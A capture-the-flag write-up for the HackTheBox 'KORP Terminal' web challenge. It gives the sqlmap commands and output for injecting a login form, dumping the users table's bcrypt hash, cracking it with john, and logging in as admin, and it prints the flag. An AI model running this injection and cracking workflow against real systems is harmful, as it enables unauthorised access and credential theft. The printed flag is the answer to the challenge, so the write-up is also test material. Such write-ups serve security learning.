Rating:
# KORP Terminal
## Video Walkthrough
[![VIDEO](https://img.youtube.com/vi/-vhl8ixthO4/0.jpg)](https://www.youtube.com/watch?v=-vhl8ixthO4?t=375 "HackTheBox Cyber Apocalypse '24: KORP Terminal (web)")
## Description
> Your faction must infiltrate the KORP™ terminal and gain access to the Legionaries' privileged information and find out more about the organizers of the Fray. The terminal login screen is protected by state-of-the-art encryption and security protocols.
## Solution
Greeted by a login page. If we send single quotes in username/password box it triggers a MySQL error!
Tried SQLMap but it fails due to `401: Unauthorized`.
Luckily, we can just ignore that HTTP code.
```bash
sqlmap -r new.req --batch --ignore-code 401
[INFO] POST parameter 'username' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
```
Find the databases.
```bash
sqlmap -r new.req --batch --ignore-code 401 --dbs
available databases [3]:
[*] information_schema
[*] korp_terminal
[*] test
```
Then the tables.
```bash
sqlmap -r new.req --batch --ignore-code 401 -D korp_terminal --tables
+-------+
| users |
+-------+
```
Dump the passwords.
```bash
sqlmap -r new.req --batch --ignore-code 401 -D korp_terminal -T users -C password --dump
+--------------------------------------------------------------+
| password |
+--------------------------------------------------------------+
| $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. |
+--------------------------------------------------------------+
```
Crack the `bcrypt` hash with `john`.
```bash
john hash --wordlist=$rockyou
password123
```
Log in to the app and receive the flag.
```bash
admin:password123
```
Flag: `HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}`